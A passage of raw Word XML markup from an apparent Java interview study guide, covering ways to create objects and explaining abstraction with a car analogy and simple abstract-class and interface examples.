    <w:p w14:paraId="6EC58D92" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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yClass obj = MyClassFactory.createMyClass(); // Factory pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD4FA19" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248B65D4" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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Or using a builder pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE3A34" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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yClass obj = MyClass.builder().id(1).name("Test").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B9B9C" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE7E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44C9806">
          <v:rect id="_x0000_i1306" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD646C" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EE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91"/>
        <w:gridCol w:w="2764"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="6F692EC9" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EF25847" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EEA">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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72317BD9" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7EEA">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CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="0AB8A359" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3134D812" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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ew keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5351F88A" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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ndard way to create object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="6367FC96" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="685F3F4F" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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forName() / Reflection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="290C9976" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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ynamic class loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="64D7BE83" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2751F397" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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one()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DFAAD51" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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uplicate an object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="22563AA7" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43B4895F" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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serialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0006DCEE" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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store from saved state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7EEA" w:rsidRPr="00CE4B95" w14:paraId="7DAB6C62" w14:textId="77777777" w:rsidTr="00B952C0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6114E83E" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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actory / Builder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A1E7640" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00B952C0" w:rsidP="00CE7E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attern-based creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3469E49D" w14:textId="77777777" w:rsidR="00B952C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B952C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97118D7">
          <v:rect id="_x0000_i1307" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426D9A6" w14:textId="77777777" w:rsidR="002B025E" w:rsidRPr="00CE4B95" w:rsidRDefault="002B025E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc196307591"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Abstraction?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="70173077" w14:textId="0569F8E2" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">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bstraction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is one of the core </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OOP principles</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">It means </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hiding internal implementation details</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and showing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only essential features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB4B6D" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0086711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64E9E6D">
          <v:rect id="_x0000_i1308" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A797AB9" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711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eal-life Analogy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2165FB27" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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you </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>drive a car</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you just use the steering wheel, accelerator, and brakes —</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don’t need to know</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> how the engine works internally.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstraction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: hiding the complex system behind a simple interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6060C907" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0086711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1208688">
          <v:rect id="_x0000_i1309" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D04C8" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711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In Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D546F" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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bstraction is achieved us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1"/>
        <w:gridCol w:w="6124"/>
      </w:tblGrid>
      <w:tr w:rsidR="0086711B" w:rsidRPr="00CE4B95" w14:paraId="1C1883B0" w14:textId="77777777" w:rsidTr="002C6869">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="551CEFD4" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711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5229791F" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086711B" w:rsidRPr="00CE4B95" w14:paraId="14CAFA5C" w14:textId="77777777" w:rsidTr="002C6869">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7380C037" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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bstract classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D5AF08C" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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artial abstraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0086711B" w:rsidRPr="00CE4B95" w14:paraId="5635EF1D" w14:textId="77777777" w:rsidTr="002C6869">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49F36A8C" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A4B4F82" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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ll abstraction (from Java 8+, can have default/static methods too)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E2310E9" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0086711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7D5B518">
          <v:rect id="_x0000_i1310" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="524CB1A1" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711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1. Abstract Class Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63475869" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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bstract class Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431795B4" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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bstract void makeSound(); // Abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6E0E5" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="207EAE79" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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eat() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F82668" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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Eating...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E64470" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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4DC62AA" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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5C1F5C3" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CFE2A29" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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Dog extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA42529" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D326D90" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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Bark");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1F4B8" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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A3614A7" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C33465" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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nimal provides a common interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BDC58E" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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og provides the actual implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1950C1A3" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0086711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C914192">
          <v:rect id="_x0000_i1311" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A215704" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711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2. Interface Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C141542" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298078E4" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA9CAB" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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C491DCA" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C08CE23" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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Car implements Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D8E305" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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start() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0389E32E" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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ar is starting...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDCFD34" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869"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7EA9526" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711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D68A3CE" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0086711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B8D59E7">
          <v:rect id="_x0000_i1312" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0260D6E1" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711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y use Abstraction?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58201C53" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reduce complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB8AE6" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>achieve loose coupling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C75DF" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hide implementation details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07829719" w14:textId="77777777" w:rsidR="002C6869" w:rsidRPr="00CE4B95" w:rsidRDefault="002C6869" w:rsidP="0086711B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
